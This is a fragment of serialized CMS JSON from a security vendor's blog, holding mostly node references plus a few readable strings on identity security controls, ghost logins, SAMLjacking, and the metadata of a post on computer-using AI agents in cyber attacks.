"data":151203,"content":151204},{"uri":114584},[151205],{"nodeType":173,"value":114587,"marks":151206,"data":151208},[151207],{"type":194},{},{"nodeType":173,"value":114592,"marks":151210,"data":151211},[],{},{"nodeType":178,"data":151213,"content":151214},{},[151215],{"nodeType":173,"value":114599,"marks":151216,"data":151217},[],{},{"nodeType":178,"data":151219,"content":151220},{},[151221],{"nodeType":173,"value":114606,"marks":151222,"data":151223},[],{},{"nodeType":178,"data":151225,"content":151226},{},[151227],{"nodeType":173,"value":114613,"marks":151228,"data":151229},[],{},{"nodeType":250,"data":151231,"content":151232},{},[151233,151242],{"nodeType":254,"data":151234,"content":151235},{},[151236],{"nodeType":178,"data":151237,"content":151238},{},[151239],{"nodeType":173,"value":114626,"marks":151240,"data":151241},[],{},{"nodeType":254,"data":151243,"content":151244},{},[151245],{"nodeType":178,"data":151246,"content":151247},{},[151248],{"nodeType":173,"value":114636,"marks":151249,"data":151250},[],{},{"nodeType":178,"data":151252,"content":151253},{},[151254],{"nodeType":173,"value":114643,"marks":151255,"data":151257},[151256],{"type":370},{},{"nodeType":231,"data":151259,"content":151260},{},[],{"nodeType":169,"data":151262,"content":151263},{},[151264],{"nodeType":173,"value":114654,"marks":151265,"data":151267},[151266],{"type":370},{},{"nodeType":178,"data":151269,"content":151270},{},[151271],{"nodeType":173,"value":114662,"marks":151272,"data":151273},[],{},{"nodeType":178,"data":151275,"content":151276},{},[151277],{"nodeType":173,"value":114669,"marks":151278,"data":151279},[],{},{"nodeType":178,"data":151281,"content":151282},{},[151283],{"nodeType":173,"value":114676,"marks":151284,"data":151285},[],{},{"nodeType":178,"data":151287,"content":151288},{},[151289],{"nodeType":173,"value":114683,"marks":151290,"data":151291},[],{},{"nodeType":312,"data":151293,"content":151296},{"target":151294},{"sys":151295},{"id":114690,"type":317,"linkType":318},[],{"nodeType":178,"data":151298,"content":151299},{},[151300],{"nodeType":173,"value":114696,"marks":151301,"data":151302},[],{},{"nodeType":178,"data":151304,"content":151305},{},[151306],{"nodeType":173,"value":114703,"marks":151307,"data":151308},[],{},{"nodeType":250,"data":151310,"content":151311},{},[151312,151321,151330],{"nodeType":254,"data":151313,"content":151314},{},[151315],{"nodeType":178,"data":151316,"content":151317},{},[151318],{"nodeType":173,"value":114716,"marks":151319,"data":151320},[],{},{"nodeType":254,"data":151322,"content":151323},{},[151324],{"nodeType":178,"data":151325,"content":151326},{},[151327],{"nodeType":173,"value":114726,"marks":151328,"data":151329},[],{},{"nodeType":254,"data":151331,"content":151332},{},[151333],{"nodeType":178,"data":151334,"content":151335},{},[151336],{"nodeType":173,"value":114736,"marks":151337,"data":151338},[],{},{"nodeType":178,"data":151340,"content":151341},{},[151342],{"nodeType":173,"value":114743,"marks":151343,"data":151344},[],{},{"nodeType":235,"data":151346,"content":151347},{},[151348],{"nodeType":173,"value":114750,"marks":151349,"data":151351},[151350],{"type":370},{},{"nodeType":312,"data":151353,"content":151356},{"target":151354},{"sys":151355},{"id":114758,"type":317,"linkType":318},[],{"nodeType":178,"data":151358,"content":151359},{},[151360],{"nodeType":173,"value":114764,"marks":151361,"data":151362},[],{},{"nodeType":178,"data":151364,"content":151365},{},[151366,151369,151376],{"nodeType":173,"value":114771,"marks":151367,"data":151368},[],{},{"nodeType":186,"data":151370,"content":151371},{"uri":832},[151372],{"nodeType":173,"value":835,"marks":151373,"data":151375},[151374],{"type":194},{},{"nodeType":173,"value":114782,"marks":151377,"data":151378},[],{},{"nodeType":178,"data":151380,"content":151381},{},[151382,151385,151392],{"nodeType":173,"value":114789,"marks":151383,"data":151384},[],{},{"nodeType":186,"data":151386,"content":151387},{"uri":61709},[151388],{"nodeType":173,"value":114796,"marks":151389,"data":151391},[151390],{"type":194},{},{"nodeType":173,"value":114801,"marks":151393,"data":151394},[],{},{"nodeType":235,"data":151396,"content":151397},{},[151398],{"nodeType":173,"value":114808,"marks":151399,"data":151401},[151400],{"type":370},{},{"nodeType":178,"data":151403,"content":151404},{},[151405,151408,151415],{"nodeType":173,"value":114816,"marks":151406,"data":151407},[],{},{"nodeType":186,"data":151409,"content":151410},{"uri":70029},[151411],{"nodeType":173,"value":63256,"marks":151412,"data":151414},[151413],{"type":194},{},{"nodeType":173,"value":114827,"marks":151416,"data":151417},[],{},{"nodeType":312,"data":151419,"content":151422},{"target":151420},{"sys":151421},{"id":114834,"type":317,"linkType":318},[],{"nodeType":178,"data":151424,"content":151425},{},[151426],{"nodeType":173,"value":114840,"marks":151427,"data":151428},[],{},{"nodeType":178,"data":151430,"content":151431},{},[151432],{"nodeType":173,"value":114847,"marks":151433,"data":151434},[],{},{"nodeType":250,"data":151436,"content":151437},{},[151438,151447,151456],{"nodeType":254,"data":151439,"content":151440},{},[151441],{"nodeType":178,"data":151442,"content":151443},{},[151444],{"nodeType":173,"value":114860,"marks":151445,"data":151446},[],{},{"nodeType":254,"data":151448,"content":151449},{},[151450],{"nodeType":178,"data":151451,"content":151452},{},[151453],{"nodeType":173,"value":114870,"marks":151454,"data":151455},[],{},{"nodeType":254,"data":151457,"content":151458},{},[151459],{"nodeType":178,"data":151460,"content":151461},{},[151462],{"nodeType":173,"value":114880,"marks":151463,"data":151464},[],{},{"nodeType":235,"data":151466,"content":151467},{},[151468],{"nodeType":173,"value":114887,"marks":151469,"data":151471},[151470],{"type":370},{},{"nodeType":178,"data":151473,"content":151474},{},[151475],{"nodeType":173,"value":114895,"marks":151476,"data":151477},[],{},{"nodeType":312,"data":151479,"content":151482},{"target":151480},{"sys":151481},{"id":114902,"type":317,"linkType":318},[],{"nodeType":178,"data":151484,"content":151485},{},[151486],{"nodeType":173,"value":114908,"marks":151487,"data":151488},[],{},{"nodeType":178,"data":151490,"content":151491},{},[151492],{"nodeType":173,"value":114915,"marks":151493,"data":151494},[],{},{"nodeType":178,"data":151496,"content":151497},{},[151498,151501,151508,151511,151518],{"nodeType":173,"value":114922,"marks":151499,"data":151500},[],{},{"nodeType":186,"data":151502,"content":151503},{"uri":775},[151504],{"nodeType":173,"value":778,"marks":151505,"data":151507},[151506],{"type":194},{},{"nodeType":173,"value":933,"marks":151509,"data":151510},[],{},{"nodeType":186,"data":151512,"content":151513},{"uri":61157},[151514],{"nodeType":173,"value":114939,"marks":151515,"data":151517},[151516],{"type":194},{},{"nodeType":173,"value":114944,"marks":151519,"data":151520},[],{},{"nodeType":235,"data":151522,"content":151523},{},[151524],{"nodeType":173,"value":114951,"marks":151525,"data":151527},[151526],{"type":370},{},{"nodeType":178,"data":151529,"content":151530},{},[151531,151534,151541],{"nodeType":173,"value":114959,"marks":151532,"data":151533},[],{},{"nodeType":186,"data":151535,"content":151536},{"uri":114964},[151537],{"nodeType":173,"value":114967,"marks":151538,"data":151540},[151539],{"type":194},{},{"nodeType":173,"value":114972,"marks":151542,"data":151543},[],{},{"nodeType":235,"data":151545,"content":151546},{},[151547],{"nodeType":173,"value":114979,"marks":151548,"data":151550},[151549],{"type":370},{},{"nodeType":178,"data":151552,"content":151553},{},[151554,151557,151564],{"nodeType":173,"value":114987,"marks":151555,"data":151556},[],{},{"nodeType":186,"data":151558,"content":151559},{"uri":114992},[151560],{"nodeType":173,"value":114995,"marks":151561,"data":151563},[151562],{"type":194},{},{"nodeType":173,"value":115000,"marks":151565,"data":151566},[],{},{"nodeType":235,"data":151568,"content":151569},{},[151570],{"nodeType":173,"value":115007,"marks":151571,"data":151573},[151572],{"type":370},{},{"nodeType":178,"data":151575,"content":151576},{},[151577],{"nodeType":173,"value":115015,"marks":151578,"data":151579},[],{},{"nodeType":312,"data":151581,"content":151584},{"target":151582},{"sys":151583},{"id":115022,"type":317,"linkType":318},[],{"nodeType":178,"data":151586,"content":151587},{},[151588],{"nodeType":173,"value":115028,"marks":151589,"data":151590},[],{},{"nodeType":231,"data":151592,"content":151593},{},[],{"nodeType":169,"data":151595,"content":151596},{},[151597],{"nodeType":173,"value":115038,"marks":151598,"data":151600},[151599],{"type":370},{},{"nodeType":178,"data":151602,"content":151603},{},[151604,151607,151614],{"nodeType":173,"value":115046,"marks":151605,"data":151606},[],{},{"nodeType":186,"data":151608,"content":151609},{"uri":115051},[151610],{"nodeType":173,"value":115054,"marks":151611,"data":151613},[151612],{"type":194},{},{"nodeType":173,"value":115059,"marks":151615,"data":151616},[],{},{"nodeType":250,"data":151618,"content":151619},{},[151620,151639,151648,151657],{"nodeType":254,"data":151621,"content":151622},{},[151623],{"nodeType":178,"data":151624,"content":151625},{},[151626,151629,151636],{"nodeType":173,"value":115072,"marks":151627,"data":151628},[],{},{"nodeType":186,"data":151630,"content":151631},{"uri":115077},[151632],{"nodeType":173,"value":115080,"marks":151633,"data":151635},[151634],{"type":194},{},{"nodeType":173,"value":60235,"marks":151637,"data":151638},[],{},{"nodeType":254,"data":151640,"content":151641},{},[151642],{"nodeType":178,"data":151643,"content":151644},{},[151645],{"nodeType":173,"value":115094,"marks":151646,"data":151647},[],{},{"nodeType":254,"data":151649,"content":151650},{},[151651],{"nodeType":178,"data":151652,"content":151653},{},[151654],{"nodeType":173,"value":115104,"marks":151655,"data":151656},[],{},{"nodeType":254,"data":151658,"content":151659},{},[151660],{"nodeType":178,"data":151661,"content":151662},{},[151663],{"nodeType":173,"value":115114,"marks":151664,"data":151665},[],{},{"nodeType":178,"data":151667,"content":151668},{},[151669],{"nodeType":173,"value":115121,"marks":151670,"data":151671},[],{},{"nodeType":178,"data":151673,"content":151674},{},[151675],{"nodeType":173,"value":115128,"marks":151676,"data":151677},[],{},{"nodeType":235,"data":151679,"content":151680},{},[151681],{"nodeType":173,"value":115135,"marks":151682,"data":151684},[151683],{"type":370},{},{"nodeType":178,"data":151686,"content":151687},{},[151688],{"nodeType":173,"value":115143,"marks":151689,"data":151690},[],{},{"nodeType":250,"data":151692,"content":151693},{},[151694,151703],{"nodeType":254,"data":151695,"content":151696},{},[151697],{"nodeType":178,"data":151698,"content":151699},{},[151700],{"nodeType":173,"value":115156,"marks":151701,"data":151702},[],{},{"nodeType":254,"data":151704,"content":151705},{},[151706],{"nodeType":178,"data":151707,"content":151708},{},[151709],{"nodeType":173,"value":115166,"marks":151710,"data":151711},[],{},{"nodeType":178,"data":151713,"content":151714},{},[151715],{"nodeType":173,"value":115173,"marks":151716,"data":151717},[],{},{"nodeType":178,"data":151719,"content":151720},{},[151721,151724,151731],{"nodeType":173,"value":5039,"marks":151722,"data":151723},[],{},{"nodeType":186,"data":151725,"content":151726},{"uri":115184},[151727],{"nodeType":173,"value":115187,"marks":151728,"data":151730},[151729],{"type":194},{},{"nodeType":173,"value":115192,"marks":151732,"data":151733},[],{},{"nodeType":312,"data":151735,"content":151738},{"target":151736},{"sys":151737},{"id":115199,"type":317,"linkType":318},[],{"nodeType":178,"data":151740,"content":151741},{},[151742],{"nodeType":173,"value":115205,"marks":151743,"data":151744},[],{},{"nodeType":312,"data":151746,"content":151749},{"target":151747},{"sys":151748},{"id":115212,"type":317,"linkType":318},[],{"nodeType":178,"data":151751,"content":151752},{},[151753],{"nodeType":173,"value":115218,"marks":151754,"data":151755},[],{},{"nodeType":250,"data":151757,"content":151758},{},[151759,151768,151777,151786,151795,151804],{"nodeType":254,"data":151760,"content":151761},{},[151762],{"nodeType":178,"data":151763,"content":151764},{},[151765],{"nodeType":173,"value":115231,"marks":151766,"data":151767},[],{},{"nodeType":254,"data":151769,"content":151770},{},[151771],{"nodeType":178,"data":151772,"content":151773},{},[151774],{"nodeType":173,"value":115241,"marks":151775,"data":151776},[],{},{"nodeType":254,"data":151778,"content":151779},{},[151780],{"nodeType":178,"data":151781,"content":151782},{},[151783],{"nodeType":173,"value":115251,"marks":151784,"data":151785},[],{},{"nodeType":254,"data":151787,"content":151788},{},[151789],{"nodeType":178,"data":151790,"content":151791},{},[151792],{"nodeType":173,"value":115261,"marks":151793,"data":151794},[],{},{"nodeType":254,"data":151796,"content":151797},{},[151798],{"nodeType":178,"data":151799,"content":151800},{},[151801],{"nodeType":173,"value":115271,"marks":151802,"data":151803},[],{},{"nodeType":254,"data":151805,"content":151806},{},[151807],{"nodeType":178,"data":151808,"content":151809},{},[151810],{"nodeType":173,"value":115281,"marks":151811,"data":151812},[],{},{"nodeType":235,"data":151814,"content":151815},{},[151816],{"nodeType":173,"value":115288,"marks":151817,"data":151819},[151818],{"type":370},{},{"nodeType":178,"data":151821,"content":151822},{},[151823,151826,151833],{"nodeType":173,"value":115296,"marks":151824,"data":151825},[],{},{"nodeType":186,"data":151827,"content":151828},{"uri":115301},[151829],{"nodeType":173,"value":115304,"marks":151830,"data":151832},[151831],{"type":194},{},{"nodeType":173,"value":115309,"marks":151834,"data":151835},[],{},{"nodeType":178,"data":151837,"content":151838},{},[151839],{"nodeType":173,"value":115316,"marks":151840,"data":151841},[],{},{"nodeType":250,"data":151843,"content":151844},{},[151845,151854],{"nodeType":254,"data":151846,"content":151847},{},[151848],{"nodeType":178,"data":151849,"content":151850},{},[151851],{"nodeType":173,"value":115329,"marks":151852,"data":151853},[],{},{"nodeType":254,"data":151855,"content":151856},{},[151857],{"nodeType":178,"data":151858,"content":151859},{},[151860],{"nodeType":173,"value":115339,"marks":151861,"data":151862},[],{},{"nodeType":231,"data":151864,"content":151865},{},[],{"nodeType":169,"data":151867,"content":151868},{},[151869],{"nodeType":173,"value":27838,"marks":151870,"data":151872},[151871],{"type":370},{},{"nodeType":178,"data":151874,"content":151875},{},[151876],{"nodeType":173,"value":115356,"marks":151877,"data":151878},[],{},{"nodeType":312,"data":151880,"content":151883},{"target":151881},{"sys":151882},{"id":115363,"type":317,"linkType":318},[],{"nodeType":178,"data":151885,"content":151886},{},[151887],{"nodeType":173,"value":115369,"marks":151888,"data":151889},[],{},{"nodeType":178,"data":151891,"content":151892},{},[151893,151896,151903],{"nodeType":173,"value":37,"marks":151894,"data":151895},[],{},{"nodeType":186,"data":151897,"content":151898},{"uri":473},[151899],{"nodeType":173,"value":93499,"marks":151900,"data":151902},[151901],{"type":194},{},{"nodeType":173,"value":115386,"marks":151904,"data":151905},[],{},{"nodeType":312,"data":151907,"content":151910},{"target":151908},{"sys":151909},{"id":115393,"type":317,"linkType":318},[],{"nodeType":178,"data":151912,"content":151913},{},[151914],{"nodeType":173,"value":37,"marks":151915,"data":151916},[],{},{"entries":151918},{"hyperlink":151919,"inline":151920,"block":151921},[],[],[151922,151925,151928,151943,151957,151991,152016,152023,152029,152043],{"sys":151923,"__typename":15269,"type":15270,"ctaText":151924,"buttonLabel":67302,"buttonColour":72847,"buttonUrl":77262},{"id":4028},"Get our latest ebook to learn about the evolution of identity attacks in 2024 and their role in public breaches. ",{"sys":151926,"__typename":15269,"type":15270,"ctaText":151927,"buttonLabel":123357,"buttonColour":15273,"buttonUrl":81621},{"id":114690},"Learn how Push provides defense in depth against identity attacks before account takeover.",{"sys":151929,"__typename":5311,"content":151930,"name":151942,"title":118},{"id":114758},{"json":151931},{"data":151932,"content":151933,"nodeType":165},{},[151934],{"data":151935,"content":151936,"nodeType":178},{},[151937],{"data":151938,"marks":151939,"value":151941,"nodeType":173},{},[151940],{"type":370},"If you don’t take anything else away from this piece, this control alone will get rid of 80% of the complexity and room for vulnerabilities to creep in. ","MVSI insight box",{"sys":151944,"__typename":5311,"content":151945,"name":151956,"title":118},{"id":114834},{"json":151946},{"nodeType":165,"data":151947,"content":151948},{},[151949],{"nodeType":178,"data":151950,"content":151951},{},[151952],{"nodeType":173,"value":151953,"marks":151954,"data":151955},"Using SAMLjacking, an attacker can turn the compromise of a low risk app/identity into a much more serious one by using it to capture SSO credentials for other users of the app. ",[],{},"MVSI Insight box 2",{"sys":151958,"__typename":5311,"content":151959,"name":151990,"title":118},{"id":114902},{"json":151960},{"nodeType":165,"data":151961,"content":151962},{},[151963],{"nodeType":178,"data":151964,"content":151965},{},[151966,151970,151977,151981,151986],{"nodeType":173,"value":151967,"marks":151968,"data":151969},"One of the leading causes of identity breaches is when ",[],{},{"nodeType":186,"data":151971,"content":151972},{"uri":832},[151973],{"nodeType":173,"value":835,"marks":151974,"data":151976},[151975],{"type":194},{},{"nodeType":173,"value":151978,"marks":151979,"data":151980}," (usually a weak, breached or reused password) exist alongside a more secure login method (e.g. SAML SSO). These ghost logins can be exploitable either as a single factor, or with a weak/phishable MFA method. It doesn’t matter if your employees ",[],{},{"nodeType":173,"value":151982,"marks":151983,"data":151985},"typically",[151984],{"type":1646},{},{"nodeType":173,"value":151987,"marks":151988,"data":151989}," log in with SAML, if insecure local logins exist alongside it — because attackers can take advantage of this. ",[],{},"MVSI insight box 3",{"sys":151992,"__typename":5311,"content":151993,"name":152015,"title":118},{"id":115022},{"json":151994},{"nodeType":165,"data":151995,"content":151996},{},[151997],{"nodeType":178,"data":151998,"content":151999},{},[152000,152004,152011],{"nodeType":173,"value":152001,"marks":152002,"data":152003},"You might assume that a user with access to an IdP account also has access to the email connected to that account, but as we’ve seen with ",[],{},{"nodeType":186,"data":152005,"content":152006},{"uri":61709},[152007],{"nodeType":173,"value":74174,"marks":152008,"data":152010},[152009],{"type":194},{},{"nodeType":173,"value":152012,"marks":152013,"data":152014},", this isn’t necessarily the case. ",[],{},"MVSI insight box 4",{"sys":152017,"__typename":5345,"title":152018,"caption":152019,"layoutMode":118,"file":152020},{"id":115199},"MVSI: Example Okta login history logs","Example of Okta login history logs",{"url":152021,"width":152022,"height":117209},"https://images.ctfassets.net/y1cdw1ablpvd/2oRCAyYH72TfB2EsGxQDFK/325fceea5222e1404141e7ed89ba4b53/image1.png",1578,{"sys":152024,"__typename":5345,"title":152025,"caption":118,"layoutMode":118,"file":152026},{"id":115212},"MVSI Recommended Logs",{"url":152027,"width":112603,"height":152028},"https://images.ctfassets.net/y1cdw1ablpvd/GWJoQawV0uYCn4vdVxcXy/00bae170edfc839c7e1f37427eb309c7/Screenshot_2025-02-10_at_12.00.14.png",526,{"sys":152030,"__typename":5311,"content":152031,"name":152042,"title":118},{"id":115363},{"json":152032},{"nodeType":165,"data":152033,"content":152034},{},[152035],{"nodeType":178,"data":152036,"content":152037},{},[152038],{"nodeType":173,"value":152039,"marks":152040,"data":152041},"This is certainly not intended as a definitive standard or exhaustive list of identity controls — but hopefully provides any app developers or standards authors with food for thought! We speak for other potential customers when we say that including these controls would make your app much more attractive to the security and compliance teams of prospective buyers. ",[],{},"MVSI insight box 5",{"sys":152044,"__typename":15269,"type":15270,"ctaText":152045,"buttonLabel":30439,"buttonColour":152046,"buttonUrl":473},{"id":115393},"Book a demo to see how Push prevents and detects identity attacks across all apps your employees use. ","orange","content:blog:minimum-viable-identity-security.json","blog/minimum-viable-identity-security.json","blog/minimum-viable-identity-security",{"_path":152051,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":152052,"summary":152054,"title":144306,"subtitle":118,"metaTitle":152065,"synopsis":144307,"hashTags":118,"publishedDate":144308,"slug":144309,"ogImage":152066,"tagsCollection":152068,"relatedBlogPostsCollection":152074,"authorsCollection":154341,"content":154345,"_id":154915,"_type":5439,"_source":5440,"_file":154916,"_stem":154917,"_extension":5439},"/blog/considering-the-impact-of-computer-using-agents",{"id":143690,"publishedAt":152053},"2025-02-28T07:41:33.720Z",{"json":152055},{"data":152056,"content":152057,"nodeType":165},{},[152058],{"data":152059,"content":152060,"nodeType":178},{},[152061],{"data":152062,"marks":152063,"value":152064,"nodeType":173},{},[],"Computer-Using Agents (CUAs) are a new type of AI agent that drives your browser/OS for you. These tools (or future iterations of them) will enable low-cost, low-effort automation of common web tasks — including those frequently performed by attackers.","How Computer-Using Agents can be leveraged in cyber attacks",{"url":152067},"https://images.ctfassets.net/y1cdw1ablpvd/4ACAoxro2X0ONhQrEMDd8C/a066c8b0ec720732f98da1ed5dd2c382/Youtube_Video_Thumbnail_V2__3_.jpg",{"items":152069},[152070,152072],{"sys":152071,"name":505},{"id":504},{"sys":152073,"name":26137},{"id":26136},{"items":152075},[152076,152626,153326],{"__typename":1528,"sys":152077,"content":152078,"title":114081,"synopsis":150597,"hashTags":118,"publishedDate":150598,"slug":114082,"tagsCollection":152618,"authorsCollection":152622},{"id":113695},{"json":152079},{"nodeType":165,"data":152080,"content":152081},{},[152082,152088,152094,152100,152116,152122,152128,152131,152138,152144,152150,152156,152161,152167,152170,152177,152183,152189,152195,152201,152206,152212,152215,152222,152229,152235,152241,152247,152263,152270,152276,152282,152288,152294,152301,152307,152313,152318,152321,152328,152334,152340,152346,152352,152358,152361,152368,152374,152380,152386,152392,152398,152496,152509,152515,152520,152523,152530,152536,152596,152602],{"nodeType":178,"data":152083,"content":152084},{},[152085],{"nodeType":173,"value":149989,"marks":152086,"data":152087},[],{},{"nodeType":178,"data":152089,"content":152090},{},[152091],{"nodeType":173,"value":149996,"marks":152092,"data":152093},[],{},{"nodeType":178,"data":152095,"content":152096},{},[152097],{"nodeType":173,"value":150003,"marks":152098,"data":152099},[],{},{"nodeType":178,"data":152101,"content":152102},{},[152103,152106,152113],{"nodeType":173,"value":150010,"marks":152104,"data":152105},[],{},{"nodeType":186,"data":152107,"content":152108},{"uri":150015},[152109],{"nodeType":173,"value":150018,"marks":152110,"data":152112},[152111],{"type":194},{},{"nodeType":173,"value":1477,"marks":152114,"data":152115},[],{},{"nodeType":178,"data":152117,"content":152118},{},[152119],{"nodeType":173,"value":150029,"marks":152120,"data":152121},[],{},{"nodeType":178,"data":152123,"content":152124},{},[152125],{"nodeType":173,"value":150036,"marks":152126,"data":152127},[],{},{"nodeType":231,"data":152129,"content":152130},{},[],{"nodeType":169,"data":152132,"content":152133},{},[152134],{"nodeType":173,"value":150046,"marks":152135,"data":152137},[152136],{"type":370},{},{"nodeType":178,"data":152139,"content":152140},{},[152141],{"nodeType":173,"value":150054,"marks":152142,"data":152143},[],{},{"nodeType":178,"data":152145,"content":152146},{},[152147],{"nodeType":173,"value":150061,"marks":152148,"data":152149},[],{},{"nodeType":178,"data":152151,"content":152152},{},[152153],{"nodeType":173,"value":150068,"marks":152154,"data":152155},[],{},{"nodeType":312,"data":152157,"content":152160},{"target":152158},{"sys":152159},{"id":150075,"type":317,"linkType":318},[],{"nodeType":178,"data":152162,"content":152163},{},[152164],{"nodeType":173,"value":150081,"marks":152165,"data":152166},[],{},{"nodeType":231,"data":152168,"content":152169},{},[],{"nodeType":169,"data":152171,"content":152172},{},[152173],{"nodeType":173,"value":150091,"marks":152174,"data":152176},[152175],{"type":370},{},{"nodeType":178,"data":152178,"content":152179},{},[152180],{"nodeType":173,"value":150099,"marks":152181,"data":152182},[],{},{"nodeType":178,"data":152184,"content":152185},{},[152186],{"nodeType":173,"value":150106,"marks":152187,"data":152188},[],{},{"nodeType":178,"data":152190,"content":152191},{},[152192],{"nodeType":173,"value":150113,"marks":152193,"data":152194},[],{},{"nodeType":178,"data":152196,"content":152197},{},[152198],{"nodeType":173,"value":150120,"marks":152199,"data":152200},[],{},{"nodeType":312,"data":152202,"content":152205},{"target":152203},{"sys":152204},{"id":150127,"type":317,"linkType":318},[],{"nodeType":178,"data":152207,"content":152208},{},[152209],{"nodeType":173,"value":150133,"marks":152210,"data":152211},[],{},{"nodeType":231,"data":152213,"content":152214},{},[],{"nodeType":169,"data":152216,"content":152217},{},[152218],{"nodeType":173,"value":150143,"marks":152219,"data":152221},[152220],{"type":370},{},{"nodeType":235,"data":152223,"content":152224},{},[152225],{"nodeType":173,"value":150151,"marks":152226,"data":152228},[152227],{"type":370},{},{"nodeType":178,"data":152230,"content":152231},{},[152232],{"nodeType":173,"value":150159,"marks":152233,"data":152234},[],{},{"nodeType":178,"data":152236,"content":152237},{},[152238],{"nodeType":173,"value":150166,"marks":152239,"data":152240},[],{},{"nodeType":178,"data":152242,"content":152243},{},[152244],{"nodeType":173,"value":150173,"marks":152245,"data":152246},[],{},{"nodeType":178,"data":152248,"content":152249},{},[152250,152253,152260],{"nodeType":173,"value":150180,"marks":152251,"data":152252},[],{},{"nodeType":186,"data":152254,"content":152255},{"uri":139925},[152256],{"nodeType":173,"value":150187,"marks":152257,"data":152259},[152258],{"type":194},{},{"nodeType":173,"value":150192,"marks":152261,"data":152262},[],{},{"nodeType":235,"data":152264,"content":152265},{},[152266],{"nodeType":173,"value":150199,"marks":152267,"data":152269},[152268],{"type":370},{},{"nodeType":178,"data":152271,"content":152272},{},[152273],{"nodeType":173,"value":150207,"marks":152274,"data":152275},[],{},{"nodeType":178,"data":152277,"content":152278},{},[152279],{"nodeType":173,"value":150214,"marks":152280,"data":152281},[],{},{"nodeType":178,"data":152283,"content":152284},{},[152285],{"nodeType":173,"value":150221,"marks":152286,"data":152287},[],{},{"nodeType":178,"data":152289,"content":152290},{},[152291],{"nodeType":173,"value":150228,"marks":152292,"data":152293},[],{},{"nodeType":235,"data":152295,"content":152296},{},[152297],{"nodeType":173,"value":150235,"marks":152298,"data":152300},[152299],{"type":370},{},{"nodeType":178,"data":152302,"content":152303},{},[152304],{"nodeType":173,"value":150243,"marks":152305,"data":152306},[],{},{"nodeType":178,"data":152308,"content":152309},{},[152310],{"nodeType":173,"value":150250,"marks":152311,"data":152312},[],{},{"nodeType":312,"data":152314,"content":152317},{"target":152315},{"sys":152316},{"id":150257,"type":317,"linkType":318},[],{"nodeType":231,"data":152319,"content":152320},{},[],{"nodeType":169,"data":152322,"content":152323},{},[152324],{"nodeType":173,"value":150266,"marks":152325,"data":152327},[152326],{"type":370},{},{"nodeType":178,"data":152329,"content":152330},{},[152331],{"nodeType":173,"value":150274,"marks":152332,"data":152333},[],{},{"nodeType":178,"data":152335,"content":152336},{},[152337],{"nodeType":173,"value":150281,"marks":152338,"data":152339},[],{},{"nodeType":178,"data":152341,"content":152342},{},[152343],{"nodeType":173,"value":150288,"marks":152344,"data":152345},[],{},{"nodeType":178,"data":152347,"content":152348},{},[152349],{"nodeType":173,"value":150295,"marks":152350,"data":152351},[],{},{"nodeType":178,"data":152353,"content":152354},{},[152355],{"nodeType":173,"value":150302,"marks":152356,"data":152357},[],{},{"nodeType":231,"data":152359,"content":152360},{},[],{"nodeType":169,"data":152362,"content":152363},{},[152364],{"nodeType":173,"value":150312,"marks":152365,"data":152367},[152366],{"type":370},{},{"nodeType":178,"data":152369,"content":152370},{},[152371],{"nodeType":173,"value":150320,"marks":152372,"data":152373},[],{},{"nodeType":178,"data":152375,"content":152376},{},[152377],{"nodeType":173,"value":150327,"marks":152378,"data":152379},[],{},{"nodeType":178,"data":152381,"content":152382},{},[152383],{"nodeType":173,"value":150334,"marks":152384,"data":152385},[],{},{"nodeType":178,"data":152387,"content":152388},{},[152389],{"nodeType":173,"value":150341,"marks":152390,"data":152391},[],{},{"nodeType":178,"data":152393,"content":152394},{},[152395],{"nodeType":173,"value":150348,"marks":152396,"data":152397},[],{},{"nodeType":250,"data":152399,"content":152400},{},[152401,152420,152439,152458,152477],{"nodeType":254,"data":152402,"content":152403},{},[152404],{"nodeType":178,"data":152405,"content":152406},{},[152407,152410,152417],{"nodeType":173,"value":150361,"marks":152408,"data":152409},[],{},{"nodeType":186,"data":152411,"content":152412},{"uri":125982},[152413],{"nodeType":173,"value":1300,"marks":152414,"data":152416},[152415],{"type":194},{},{"nodeType":173,"value":53584,"marks":152418,"data":152419},[],{},{"nodeType":254,"data":152421,"content":152422},{},[152423],{"nodeType":178,"data":152424,"content":152425},{},[152426,152429,152436],{"nodeType":173,"value":150381,"marks":152427,"data":152428},[],{},{"nodeType":186,"data":152430,"content":152431},{"uri":150386},[152432],{"nodeType":173,"value":150389,"marks":152433,"data":152435},[152434],{"type":194},{},{"nodeType":173,"value":53584,"marks":152437,"data":152438},[],{},{"nodeType":254,"data":152440,"content":152441},{},[152442],{"nodeType":178,"data":152443,"content":152444},{},[152445,152448,152455],{"nodeType":173,"value":150403,"marks":152446,"data":152447},[],{},{"nodeType":186,"data":152449,"content":152450},{"uri":150408},[152451],{"nodeType":173,"value":150411,"marks":152452,"data":152454},[152453],{"type":194},{},{"nodeType":173,"value":53584,"marks":152456,"data":152457},[],{},{"nodeType":254,"data":152459,"content":152460},{},[152461],{"nodeType":178,"data":152462,"content":152463},{},[152464,152467,152474],{"nodeType":173,"value":150425,"marks":152465,"data":152466},[],{},{"nodeType":186,"data":152468,"content":152469},{"uri":125812},[152470],{"nodeType":173,"value":1255,"marks":152471,"data":152473},[152472],{"type":194},{},{"nodeType":173,"value":53584,"marks":152475,"data":152476},[],{},{"nodeType":254,"data":152478,"content":152479},{},[152480],{"nodeType":178,"data":152481,"content":152482},{},[152483,152486,152493],{"nodeType":173,"value":150445,"marks":152484,"data":152485},[],{},{"nodeType":186,"data":152487,"content":152488},{"uri":150450},[152489],{"nodeType":173,"value":96495,"marks":152490,"data":152492},[152491],{"type":194},{},{"nodeType":173,"value":53584,"marks":152494,"data":152495},[],{},{"nodeType":178,"data":152497,"content":152498},{},[152499,152502,152506],{"nodeType":173,"value":150463,"marks":152500,"data":152501},[],{},{"nodeType":173,"value":150467,"marks":152503,"data":152505},[152504],{"type":370},{},{"nodeType":173,"value":150472,"marks":152507,"data":152508},[],{},{"nodeType":178,"data":152510,"content":152511},{},[152512],{"nodeType":173,"value":150479,"marks":152513,"data":152514},[],{},{"nodeType":312,"data":152516,"content":152519},{"target":152517},{"sys":152518},{"id":150486,"type":317,"linkType":318},[],{"nodeType":231,"data":152521,"content":152522},{},[],{"nodeType":169,"data":152524,"content":152525},{},[152526],{"nodeType":173,"value":150495,"marks":152527,"data":152529},[152528],{"type":370},{},{"nodeType":178,"data":152531,"content":152532},{},[152533],{"nodeType":173,"value":150503,"marks":152534,"data":152535},[],{},{"nodeType":250,"data":152537,"content":152538},{},[152539,152568,152587],{"nodeType":254,"data":152540,"content":152541},{},[152542],{"nodeType":178,"data":152543,"content":152544},{},[152545,152548,152555,152558,152565],{"nodeType":173,"value":37,"marks":152546,"data":152547},[